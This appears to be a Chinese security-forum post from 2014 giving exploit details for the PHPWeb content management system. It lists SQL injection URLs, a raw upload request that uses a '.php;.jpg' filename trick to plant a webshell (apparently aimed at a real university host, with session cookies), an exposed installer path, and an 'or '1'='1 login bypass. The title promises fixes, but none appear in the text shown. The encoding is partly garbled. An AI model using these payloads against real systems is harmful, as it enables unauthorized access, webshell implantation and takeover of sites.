我们来自五湖四海,不为别的,只因有共同的爱好,为中国互联网发展出一分力!

phpweb注射+上传+安装文件漏洞+万能密码(含修复方案)

2014年03月15日05:02 阅读: 38201 次

标签: phpweb注射+上传+安装文件漏洞+万

#?Author:?lostowlf?home:?hi.baidu.com/nginxshell
测试:
******sqlinjection*******
http://www.phpweb.net/down/class/index.php?myord=1{sqlinjection}
http://www.phpweb.net/photo/clas?…?mp;key=&myord=1?{sqlinjection}
***********getshell********
POST?/kedit/upload_cgi/upload.php?HTTP/1.0″
Accept:?image/gif,?image/x-xbitmap,?image/jpeg,?image/pjpeg,?application/xaml+xml,?application/vnd.ms-xpsdocument,?application/x-ms-xbap,?application/x-ms-application,?*/*
Referer:?http://phpweb.net/news/admin/new?…?p;pid=all&page=
Accept-Language:?zh-cn
Content-Type:?multipart/form-data;?boundary=—————————7db516c0118
UA-CPU:?x86
Pragma:?no-cache
User-Agent:?Mozilla/4.0?(compatible;?MSIE?6.0;?Windows?NT?5.2;?SV1;?.NET?CLR?1.1.4322;?.NET?CLR?2.0.50727;?.NET?CLR?3.0.04506.30)
Host:?lib.jlnu.edu.cn
Proxy-Connection:?Keep-Alive
Cookie:?CODEIMG=6878;?SYSZC=c7646d833635a773e6a89e364d9f0eca;?SYSUSER=wlf;?SYSNAME=%E7%8E%8B%E7%AB%8B%E5%B3%B0;?SYSUSERID=15;?SYSTM=1318373657-?D1?F$?M(?R3?_8?{3?U.?V
Content-Length:?6620
—————————–7db516c0118
Content-Disposition:?form-data;?name=”fileName”
201110121318373662005.php;.jpg
—————————–7db516c0118
Content-Disposition:?form-data;?name=”attachPath”
news/pics/
—————————–7db516c0118
Content-Disposition:?form-data;?name=”fileData”;?filename=”C:\6.gif”
Content-Type:?image/gif
gif89a
‘);?>
*********install?file:**********
http://www.exehack.net?/base/install/
*********admin********
www.exehack.net?/admin.php
username:?admin?‘or?’1′=’1
username:?admin?‘or?’1′=’1
分享到: 更多
?2019 安全焦点 版权所有.